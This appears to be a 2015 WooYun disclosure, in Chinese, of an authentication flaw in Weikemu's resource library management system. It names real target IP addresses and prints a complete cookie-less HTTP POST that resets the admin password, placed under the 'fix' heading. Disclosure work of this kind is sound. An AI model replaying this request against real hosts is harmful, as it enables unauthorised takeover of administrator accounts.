当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144180

漏洞标题:威科姆中心资源库管理系统任意修改管理员密码漏洞

相关厂商:郑州威科姆科技股份有限公司

漏洞作者: 10457793

提交时间:2015-10-01 22:21

修复时间:2015-11-22 09:02

公开时间:2015-11-22 09:02

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-01: 细节已通知厂商并且等待厂商处理中
2015-10-08: 厂商已经确认,细节仅向厂商公开
2015-10-18: 细节向核心白帽子及相关领域专家公开
2015-10-28: 细节向普通白帽子公开
2015-11-07: 细节向实习白帽子公开
2015-11-22: 细节向公众公开

简要描述:

唰唰唰就是改,很奇葩的漏洞

详细说明:

利用“节目检测管理系统”(弱口令)

http://58.245.254.229/edms/index.php

修改密码的POST数据,不包含cookie即可修改“中心资源库管理系统“

http://222.161.12.132/edms/index.php#

的密码,是不是很奇葩?
根本原因就是“中心资源库管理系统“存在权限验证问题,而“节目检测管理系统”不存在
以上两个地址为吉林省某单位系统,具体不详。
案例只有这一个,如果不能按照通用漏洞审核,请直接转普通,懒得修改太麻烦,谢啦管理!

漏洞证明:

利用

http://58.245.254.229/edms/index.php

抓取密码修改POST数据

11.PNG


如下

22.png


发送到burpsuite repeater 修改通信地址后发送

33.png


即可修改admin用户密码
登陆

33.PNG

修复方案:

POST /edms/user/userinfoModify-set.php HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://58.245.254.229/edms/user/userinfoModify-you.php?mId=1
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 222.161.12.132
Content-Length: 135
Pragma: no-cache
Cookie:
textfield=admin&userTrueName=admin&userPassword=wooyun&userTele=0&userPasswordVerify=wooyun&userAddress=0&Submit=%C8%B7+%B6%A8&userID=1

版权声明:转载请注明来源 10457793@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-08 09:00

厂商回复:

加紧处理,给出感谢

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-08 09:08 | 10457793 ( 普通白帽子 | Rank:1031 漏洞数:160 | 说好的借,为什么从来不还?O(∩_∩)O)

    这个漏洞怎么还能走小厂那审核亲们